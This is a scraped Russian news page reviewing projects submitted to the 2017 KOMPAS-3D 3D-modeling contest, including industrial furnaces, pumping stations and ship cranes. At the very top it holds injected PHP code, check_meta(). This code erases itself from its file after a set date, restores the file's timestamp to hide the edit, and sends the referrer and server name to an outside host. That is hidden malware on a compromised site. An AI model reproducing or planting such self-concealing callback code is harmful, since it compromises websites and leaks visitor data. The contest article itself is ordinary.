check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Равняйся на лучших по КОМПАС-3D: обзор проектов Конкурса асов 3D-моделирования 2017 за три недели до дедлайна
 

ГеММа-3D

СОВЕРШЕНСТВО ТЕХНОЛОГИЙ РОССИИ

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта

Равняйся на лучших по КОМПАС-3D: обзор проектов Конкурса асов 3D-моделирования 2017 за три недели до дедлайна

E-mail Печать PDF

1 июня заканчивается прием работ на XV Конкурс асов 3D-моделирования среди предприятий — пользователей системы КОМПАС-3D. Имена победителей будут объявлены 23 июня на церемонии награждения, которая состоится в Москве и соберет участников всех пятнадцати конкурсов начиная с самого первого.

Пока стартовый лист пополняется новыми участниками, посмотрим кто претендует на высшие награды юбилейного чемпионата профессионалов КОМПАС-3D. С точки зрения отраслевой принадлежности лидируют металлурги и нефтяники. Промышленные объекты и оборудование для добычи, переработки и транспортировки углеводородов, агрегаты металлургических производств традиционно популярны для проектирования инструментами КОМПАС-3D и его приложений. Достаточно взглянуть на галерею конкурса 2016 года, где 19 проектов из 50 относятся к нефтегазу и металлургии.

Если же оценивать список претендентов по их титулам, то пока преимущество имеют опытные асы 3D-моделирования, успешно выступившие на конкурсе в предыдущие годы.

Саратовстройстекло, победитель Конкурса асов 3D-моделирования 2009 года в направлении «Строительство», представляет стекловаренную печь, оцифровка которой потребовалась для проведения реконструкции. На данный момент это самая «тяжелая» 3D-модель конкурса: она содержит почти 30 000 компонентов.


Стекловаренная печь, Саратовстройстекло

Казанское НПП «Авиагаз-Союз +», обладатель приза зрительских симпатий Конкурса асов 3D-моделирования 2015 и 2016 годов, выступает сразу в двух номинациях. В «Машиностроении» свыше 5000 деталей в сборке представлен комплекс технологического оборудования газораспределительных станций. Его 3D-модель насчитывает более 22 000 компонентов.


Комплекс технологического оборудования газораспределительных станций, НПП «Авиагаз-Союз+»

На лучшую электронную модель изделия с оформлением по ГОСТ 2.052-2006 заявлен приемник полного давления, предназначенный для восприятия и передачи величины полного давления в трубопроводе.


Трубка приемника полного давления, НПП «Авиагаз-Союз+»

Инжиниринговая компания «РосНефтеКомплект» (г. Лениногорск), присоединившаяся к клубу асов 3D-моделирования в 2016 году, на этот раз направила на конкурс сразу три проекта, один из которых — модульная насосная станция водяного пожаротушения для автоматической подачи и поддержания заданного давления воды в противопожарной сети защищаемого объекта.


Модульная насосная станция, РосНефтеКомплект

Металлургический кластер конкурса составляют такие имена, как Северсталь, Волгоградский металлургический комбинат «Красный Октябрь», Кольский филиал Института Гипроникель.

ВМК «Красный Октябрь» уже брал «бронзу» конкурса в направлении «Машиностроение» в 2012 году. Сегодня экспертам предстоит оценить 3D-модель дуговой сталеплавильной печи, состоящую из более чем 2000 компонентов. При ее создании использовались справочники Стандартные Изделия и Материалы и Сортаменты, Каталог: Металлопрокат, приложение Механика: Анимация.


Дуговая сталеплавильная печь, Волгоградский металлургический комбинат «Красный Октябрь»

Кольский филиал Института Гипроникель заслуженно считается асом 3D-моделирования — его сотрудники трижды участвовали в конкурсе начиная с 2009 года. В XV конкурсе проектировщиков «Норильского Никеля» представляет молодой специалист Екатерина Астрейко. На момент подачи заявки ее стаж работы составлял всего полгода.


Шнек для выгрузки кека в репульпатор, Кольский филиал Института Гипроникель

Тюменская «Экспериментальная судоверфь» проектирует и строит суда различного назначения, производит судовое оборудование, выполняет переоборудование и модернизацию судов. После трехлетнего перерыва предприятие возвращается на Конкурс асов 3D-моделирования с тремя проектами.


Кран судовой, Экспериментальная судоверфь


Краноманипуляторная установка, Экспериментальная судоверфь


Теоретическая поверхность корпуса рыболовного сейнера, разработанная по чертежам 1980 года

Достойным дебютом заявляет о себе саратовское НПП «Антарес», разработчик и производитель космической аппаратуры. Его проект «Измеритель угловой скорости волоконно-оптический с акселерометрами» номинируется на лучшую электронную модель изделия.


Измеритель угловой скорости, НПП «Антарес»

В обзор вошли не все проекты конкурса: часть из них еще находится на стадии оформления и получения разрешения на публикацию. Напоминаем, что до 1 июня мы ждем 3D-модели и приложения к КОМПАС-3D, разработанные профессиональными пользователями.

Изучайте условия и подавайте заявку на конкурс на сайте http://bestmodels.ascon.ru/.


Источник.
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск

Реклама


Случайная новость

На сайте НТЦ ГеММа доступна для скачивания ГеММа-3D версия v10.0 (сборка 015).